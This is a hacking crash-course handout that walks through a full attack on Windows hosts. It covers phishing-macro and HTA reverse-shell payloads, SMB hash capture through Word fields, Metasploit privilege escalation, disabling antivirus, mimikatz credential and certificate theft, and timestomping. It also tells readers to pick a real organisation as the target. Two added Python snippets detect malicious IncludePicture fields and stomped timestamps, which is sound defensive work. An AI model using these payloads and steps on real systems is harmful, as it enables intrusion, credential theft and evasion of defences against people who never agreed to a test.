- ##############################
- # Hacking Crash Course Day 1 #
- # Luke Ager #
- ##############################
- ###############
- # Virtual BOX #
- ###############
- Although you can get the machines working in VMware Workstation or Fusion, I'll be supporting VirtualBox for this course. You can use other products if you are comfortable with setting them up correctly yourself.
- https://www.virtualbox.org/wiki/Downloads
- #####################################
- # Download the attack iso from Kali #
- #####################################
- https://www.kali.org/downloads/
- Install (do not boot live)
- ###########################
- # Download the victim VM #
- ###########################
- https://drive.google.com/open?id=0BzsF4HrNTtXzemt6R1gybVZRczQ
- pass: Password1
- ########################################
- # Boot up the VMs #
- ########################################
- Before you boot, check that the network adapters are bridged; once up, check that all guests are on the same network and can ping each other.
- Log into your Kali box with the credentials you set during the install.
- ###########################
- # Finally getting started #
- ###########################
- msfupdate
- msfconsole
- ##############################################
- # Run any Linux command inside of MSFConsole #
- ##############################################
- ls
- pwd
- ping -c1 yahoo.com
- nmap yahoo.com
- ###############
- # Note taking #
- ###############
- Use KeepNote to record everything as you go.
- #############################################################
- # Congratulations you are now a pentester, now get to work! #
- #############################################################
- You are a pentester for ACME Corp and have been assigned to a new customer to conduct a red team test. You must gain access within the rules of engagement agreed with the customer.
- For this engagement, the customer has ruled out physical contact. The test must be limited to remote attacks only. No on-premises social engineering.
- The customer is… (find one)
- (Note: aim for an SME or enterprise organisation. You must not attack offensively, and you accept all responsibility for your actions.)
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # RECON #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Let's start with some simple DNS recon.
- Understand the attack surface and find a way in. Easy but very effective.
- fierce -dns target.com
- dnsmap target.com
- Look for remote-worker access: VPN, Citrix, Outlook Web Access.
- -------------------------------
- Now that you have DNS names, you can probe them deeper with port scans to look for misconfigured ports or weaknesses. This usually gives results for the smaller companies; it doesn't usually give much on the bigger ones. In honesty, I do not usually port scan the perimeter, but there is certainly value in doing this. Personally, I attack users for credentials and then gain access the easy way.
- ########################################
- # NMAP Example #
- ########################################
- nmap target.com -A
- (full port scan, banner grab and OS fingerprint; this is loud, but on the external perimeter that is not such a big issue)
- You can also scan with Metasploit if you prefer; use the auxiliary scanner modules.
- ########################################
- # Record all your findings in Keepnote #
- ########################################
- Now that we have an understanding of the perimeter, let's look for targets. People are always the way in!
- Old school is still the best:
- theharvester -d target.com -b all -f target
- Now we have some employees and their email addresses. Let's go hunting for the right target!
- My personal favourite is LinkedInt; however, there is currently a bug. Worth checking on.
- ####################################
- # Use Maltego to resource targets. #
- ####################################
- Maltego is not always the answer but it does help with SE recon. Find a target and understand more about them before moving into weaponisation.
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # WEAPONISATION #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ##################################
- # Basic Client-Side Exploitation #
- ##################################
- git clone https://github.com/Veil-Framework/Veil-Evasion
- cd Veil-Evasion/
- cd setup
- ./setup.sh -c
- cd ..
- ./Veil-Evasion.py -p powershell/meterpreter/rev_https -c LHOST=192.168.1.13 LPORT=443 PROXY=Y --overwrite
- copy payload path.
- python macro_safe.py %PATH FROM ABOVE% %Filename%
- Copy the output into an MS Office Word macro.
- Set the macro to run from AutoOpen() as detailed here: http://wordmvp/FAQs/MacrosVBA/DocumentEvents.htm
- ##################################
- # Metasploit server #
- ##################################
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_https
- set lhost 192.168.1.13
- set lport 443
- set exitonsession false
- exploit -j
- (if you have speakers on Kali:
- back
- load sounds
- )
- ####################################################
- # What if macros don't work? ... The FireEye effect. #
- ####################################################
- Tier 1/2 clients will sometimes have sandboxing solutions, so we need to get creative. Use Windows features such as UNC/SMB paths, together with poor egress filtering, to grab hashes. If that doesn't work, try HTA files.
- git clone https://github.com/vysec/genHTA
- cd genHTA
- python genHTA.py
- complete questions
- ls (should show output.hta)
- run:
- msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.1.13 LPORT=443 -f hta-psh
- copy output and paste into the below:
- vim output.hta
- edit where the ' character begins in the Modifyme() function.
- mv output.hta /var/www/html
- service apache2 start
- Browse to IP/output.hta from the Windows victim, download the file and run it using IE.
- ####################################################
- # When all else fails or you just want to double up #
- ####################################################
- Add a Quick Part SMB field to your Office doc:
- Insert > Quick Parts > Field > IncludePicture
- Filename: file://IP/file
- Tick "data not stored within document"
- Listen for the hash using Metasploit or Responder.
- use auxiliary/server/capture/smb
- show options
- run
- or
- responder
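To see the same field from the defender's side, here is an added Python check (not part of the course notes) that unpacks a .docx and flags INCLUDEPICTURE fields which point at another host and carry the \d switch (data not stored with the document), the combination that makes Word reach out over SMB every time the file is opened. The document builder and the 192.0.2.10 address are constructed test data.

```python
import html
import io
import re
import zipfile
from collections import namedtuple

# Field code as Word stores it: INCLUDEPICTURE "target" followed by switches such as \d.
_FIELD_RE = re.compile(r'INCLUDEPICTURE\s+"([^"]+)"((?:\s*\\\S+)*)', re.IGNORECASE)
# Another host (file://host/share or \\host\share), not file:///C:/... or C:\... which stay local.
_REMOTE_RE = re.compile(r'^(?:file:)?(?://|\\\\)(?![/\\]|[A-Za-z]:)', re.IGNORECASE)

# remote: target is on another host, so Word opens an SMB connection to fetch it;
# fetch_on_open: the \d switch means the picture is fetched again on every open.
Finding = namedtuple("Finding", "part target remote fetch_on_open")

def scan_docx(data: bytes) -> list:
    """Find every INCLUDEPICTURE field in the document's XML parts."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml = zf.read(name).decode("utf-8", errors="replace")
            # Field codes sit in <w:fldSimple w:instr="..."> attributes or as text split
            # across several <w:instrText> runs; stripping the tags rejoins the runs.
            texts = [html.unescape(a) for a in re.findall(r'w:instr="([^"]*)"', xml)]
            texts.append(html.unescape(re.sub(r"<[^>]+>", "", xml)))
            for text in texts:
                for m in _FIELD_RE.finditer(text):
                    target, switches = m.group(1), m.group(2)
                    findings.append(Finding(name, target, bool(_REMOTE_RE.match(target)), "\\d" in switches))
    return findings

def suspicious(findings: list) -> list:
    """Remote picture fetched on open: the pattern that leaks the user's NTLM hash."""
    return [f for f in findings if f.remote and f.fetch_on_open]

def make_test_docx(field_code: str) -> bytes:
    """Constructed test input: a minimal .docx holding one field split over two runs."""
    head, tail = field_code.split(" ", 1)
    body = ('<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="http://schemas.'
            'openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p>'
            '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
            f'<w:r><w:instrText xml:space="preserve"> {head} </w:instrText></w:r>'
            f'<w:r><w:instrText xml:space="preserve">{html.escape(tail)} </w:instrText></w:r>'
            '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", body)
    return buf.getvalue()
```

Run it over inbound attachments at the mail gateway or on a sample share; a field with a local file:///C:/ path or without \d is reported by scan_docx but not by suspicious.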
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # DELIVERY #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Get creative
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # Exploitation #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Technically we aren't exploiting, but depending on what is available during your test you may use 0-days or public exploits. When they aren't available because of patching, social engineering is needed. 99% of my work relies on SE and user mistakes, not exploitation.
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # COMMAND & CONTROL #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Get a shell. Simples.
- ###########################
- # Client-Side Enumeration #
- ###########################
- - You can list the active sessions by typing:
- sessions -l
- - You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)
- sessions -i 1
- - You should now see Metasploit's meterpreter prompt.
- ********************************** Figure out who and where you are **********************************
- meterpreter> sysinfo
- meterpreter> getuid
- meterpreter> ipconfig
- meterpreter> run post/windows/gather/checkvm
- meterpreter> run get_local_subnets
- ********************************** Escalate privileges and get hashes **********************************
- Most of the options below won't work on up-to-date machines; my preference is option 4. Older machines with an out-of-date patch level will give more success.
- meterpreter> use priv
- --Option 1: GetSystem
- meterpreter> getsystem
- --Option 2:
- meterpreter > run post/windows/escalate/getsystem
- --Option 3:
- meterpreter> background
- back
- use post/windows/escalate/droplnk
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your IP address)
- set LPORT 1234
- exploit
- --Option 4:
- use exploit/windows/local/bypassuac
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your IP address)
- set LPORT 12345
- exploit
- --Option 5:
- use exploit/windows/local/service_permissions
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your IP address)
- set LPORT 5555
- exploit
- --Option 6:
- use exploit/windows/local/trusted_service_path
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your IP address)
- set LPORT 4567
- exploit
- --Option 7:
- use exploit/windows/local/ppr_flatten_rec
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your IP address)
- set LPORT 7777
- exploit
- --Option 8:
- use exploit/windows/local/ms_ndproxy
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your IP address)
- set LPORT 7788
- exploit
- --Option 9:
- use exploit/windows/local/ask
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your IP address)
- set LPORT 7799
- exploit
- meterpreter > getuid
- Server username: win7-64-victim\Workshop
- meterpreter > getsystem
- ...got system (via technique 1).
- meterpreter > getuid
- Server username: NT AUTHORITY\SYSTEM
- --------------------------------------------------------
- meterpreter> run killav
- meterpreter> run post/windows/gather/hashdump
- meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
- meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
- meterpreter> run post/windows/gather/credentials/credential_collector
- ************ Stealing credentials and certificates ************
- - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
- meterpreter > getsystem
- meterpreter > load mimikatz
- meterpreter > kerberos
- meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
- meterpreter > msv <-- Your AD password
- meterpreter > livessp <-- Your Windows8 password
- meterpreter > ssp <-- Your outlook password
- meterpreter > tspkg <-- Your AD password
- meterpreter > wdigest <-- Your AD password
- meterpreter > mimikatz_command -f crypto::listStores
- meterpreter > mimikatz_command -f crypto::listCertificates
- meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
- meterpreter > mimikatz_command -f crypto::patchcapi
- meterpreter> search -d <directory> -f <file-pattern>
- ********************************** Enumerate the host you are on **********************************
- meterpreter > run getcountermeasure
- meterpreter > run post/windows/gather/enum_applications
- meterpreter > run post/windows/gather/enum_logged_on_users
- meterpreter > run post/windows/gather/usb_history
- meterpreter > run post/windows/gather/enum_shares
- meterpreter > run post/windows/gather/enum_snmp
- meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
- ********************************** Prove access **********************************
- meterpreter> upload /home/proof.txt c:\\
- meterpreter > timestomp C:\\proof.txt -v
- meterpreter > timestomp C:\\proof.txt -m "12/12/2014 12:12:14"
- meterpreter > timestomp C:\\proof.txt -v
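An added triage check for the timestomp step above (example code, not from the course): a timestamp typed as "MM/DD/YYYY HH:MM:SS" can only be a whole second, so files whose modification time has an exactly zero sub-second part stand out against the nanosecond fractions that ordinary writes leave behind. The two sample files and their timestamps are constructed.

```python
import os
import tempfile
from pathlib import Path

NS_PER_SEC = 1_000_000_000

def whole_second_mtime(paths):
    """Return the paths whose modification time has a sub-second part of exactly zero.

    A value set from a "MM/DD/YYYY HH:MM:SS" string (the timestomp -m form) is always a
    whole second, while a write on NTFS, ext4 or tmpfs almost always leaves a non-zero
    fraction, so a clean .000000000 is a cheap signal worth a closer look.
    Caveat: FAT and ext3 store coarse timestamps, so on those volumes every file matches.
    """
    return [str(p) for p in paths if os.stat(p).st_mtime_ns % NS_PER_SEC == 0]

def demo():
    """Constructed sample: two files, one with its mtime rewritten to a whole second."""
    with tempfile.TemporaryDirectory() as d:
        normal = Path(d, "report.txt")
        stomped = Path(d, "proof.txt")
        for f in (normal, stomped):
            f.write_text("sample")
        # An untouched file keeps whatever fraction the write produced; pin one here
        # so the demo behaves the same on every filesystem.
        os.utime(normal, ns=(1418386334_123456789, 1418386334_123456789))
        # 12/12/2014 12:12:14 UTC in nanoseconds: the fraction is exactly zero.
        os.utime(stomped, ns=(1418386334_000000000, 1418386334_000000000))
        return [Path(p).name for p in whole_second_mtime([normal, stomped])]
```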